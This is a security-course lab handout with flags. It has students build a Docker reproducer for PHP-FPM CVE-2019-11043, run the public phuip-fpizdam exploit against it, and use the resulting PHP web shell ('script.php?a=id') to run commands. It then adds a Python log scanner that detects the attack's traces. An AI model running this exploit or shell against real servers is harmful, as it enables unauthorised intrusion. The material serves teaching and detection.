ED 106: PHP-FPM Command Injection (15 pts extra)

What You Need for This Project

Purpose

To understand Web templates and practice template injection attacks. This will also involve using Docker.

Task 1: Preparing the Target Server

Installing Docker

On your Linux machine, in a Terminal, execute these commands, one at a time:

sudo apt update
sudo apt install apt-transport-https ca-certificates curl gnupg2 software-properties-common -y
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
sudo apt update
sudo apt install docker-ce -y
sudo systemctl status docker

You should see that docker is "active (running)", as shown in green letters in the image below.

Press Q to exit the status display.

Preparing the Playground Environment

On your Linux machine, in a Terminal, execute these commands, one at a time:

sudo apt install git -y
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam/reproducer/
sudo docker build -t reproduce-cve-2019-11043 .

This builds the container. It takes about 20 minutes, while many pages of messages scroll by. There are long pauses. Wait until you see all 12 steps complete, as shown below.

Execute this command:

sudo docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043

The server starts listening, as shown below.

Leave this Terminal window open.

Observing Listening Ports

Open a new SSH window to the same Linux server.

Execute this command:

sudo ss -pant

You see docker listening on port 8080, as shown below.

Opening a Port in the Google Cloud Firewall

In the Google Cloud Console, click the top left three-bar icon, scroll down to the NETWORKING section, point to "VPC network", and click "Firewall rules", as shown below.

At the top center, click "CREATE FIREWALL RULE".

Enter these items, as shown below:

At the bottom of the page, click the Create button. The firewall rule appears, as shown below.

Connecting to your Server

In the Google Cloud Console, click the top left three-bar icon, scroll down to the COMPUTE section, point to "Compute Engine", and click "VM instances".

Find the External IP for your server, as shown below.

Open a Web browser and go to this URL, replacing the IP address with the IP address of your server:

http://35.226.109.42:8080/script.php

The page is empty, as shown below.

Troubleshooting

If you are on the CCSF wireless network, it will probably block traffic on port 8080. Use a different network, or a VPN, or the "DangerZone" network in S37 to get past the firewall.

Task 2: The Attack

Installing Go

On your Linux server, in a Terminal window, execute these commands:

sudo apt update
sudo apt install curl -y

On your local computer, in a Web browser, go to

https://golang.org/dl/

Find the latest Linux 64-bit version, as shown below. Note the file name and the SHA256 checksum, outlined in green in the image below.

On your Linux server, in a Terminal window, execute these commands, adjusting the filename to match the filename you found in the previous step:

curl -O https://dl.google.com/go/go1.13.3.linux-amd64.tar.gz
sha256sum go1.13.3.linux-amd64.tar.gz

Make sure the SHA256 value matches the value on the website, as shown below.

On your Linux server, in a Terminal window, execute these commands, adjusting the filename to match the filename you found in the previous step:

tar xvf go1.13.3.linux-amd64.tar.gz
sudo chown -R root:root ./go
sudo mv go /usr/local
echo export GOPATH=$HOME/work >> ~/.profile
echo export PATH=\$PATH:/usr/local/go/bin:\$GOPATH/bin >> ~/.profile
source ~/.profile
go

Go runs, showing a help message, as shown below.

Running the Exploit

On your Linux server, execute these commands:

go get github.com/neex/phuip-fpizdam
phuip-fpizdam http://127.0.0.1:8080/script.php

The exploit runs, as shown below.

Using the PHP Shell

Now the script page acts as a PHP shell.

In a Web browser, go to this URL, replacing the IP address with the IP address of your server:

http://35.226.109.42:8080/script.php?a=id

The "id" command executes, as shown below.

Refresh the page several times. Sometimes it works, and sometimes the page is empty. That is normal; this exploit only infects some of the php-fpm workers.
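From the defender's side, the attack above leaves traces in the Web server's access log: the CVE-2019-11043 exploit sends a newline (percent-encoded as %0a) inside the path of a request for a .php script, and the later shell use shows up as requests to script.php with a command parameter. The following Python script, added here as an example and not part of the lab or of the phuip-fpizdam project, parses constructed nginx combined-format log lines and flags both patterns; the log lines, field names and indicator labels are all assumptions made for the example.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample nginx access-log lines (combined log format) for the lab's
# reproducer container; none of these are real captured traffic.
SAMPLE_LOG = """\
172.17.0.1 - - [31/Oct/2019:10:00:01 +0000] "GET /script.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
172.17.0.1 - - [31/Oct/2019:10:00:05 +0000] "GET /script.php/%0Ax.php?q=1 HTTP/1.1" 502 157 "-" "Go-http-client/1.1"
172.17.0.1 - - [31/Oct/2019:10:00:09 +0000] "GET /script.php?a=id HTTP/1.1" 200 58 "-" "Mozilla/5.0"
172.17.0.1 - - [31/Oct/2019:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_target(target: str) -> Optional[str]:
    """Return an indicator name for a suspicious request target, else None."""
    parts = urlsplit(target)
    # Indicator 1: a newline (usually sent as %0a) inside a path that routes to a
    # .php script. The CVE-2019-11043 exploit depends on that newline to upset
    # nginx's PATH_INFO handling; a legitimate URL path has no reason to contain one.
    if "\n" in unquote(parts.path) and ".php" in parts.path.lower():
        return "cve-2019-11043-path-newline"
    # Indicator 2: the lab's post-exploitation shape, script.php with an "a="
    # parameter carrying a command (webshell-style use of the backdoored worker).
    if parts.path.endswith("/script.php") and "a" in parse_qs(parts.query):
        return "php-shell-command-parameter"
    return None

def scan_log(text: str) -> list:
    """Parse each log line and collect the suspicious ones with their indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        kind = classify_target(m["target"])
        if kind:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                             "status": int(m["status"]), "indicator": kind})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['indicator']}: {f['target']} -> {f['status']}")
```

Run against a real /var/log/nginx/access.log the same way; because only some php-fpm workers are affected, a 502 on the %0a request followed by successful script.php?a= requests from the same client is the sequence to look for.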


Flag ED 106.1: Linux Version (10 pts)

Execute the "uname -a" command on the server.

The flag is covered by a green rectangle in the image below.


Flag ED 106.2: HTML File (5 pts)

There is an HTML file in the /var/www/html directory.

Find that filename. It's the flag.


References

PHuiP-FPizdaM

Posted 10-31-19
Duplicate docker command removed 11-8-19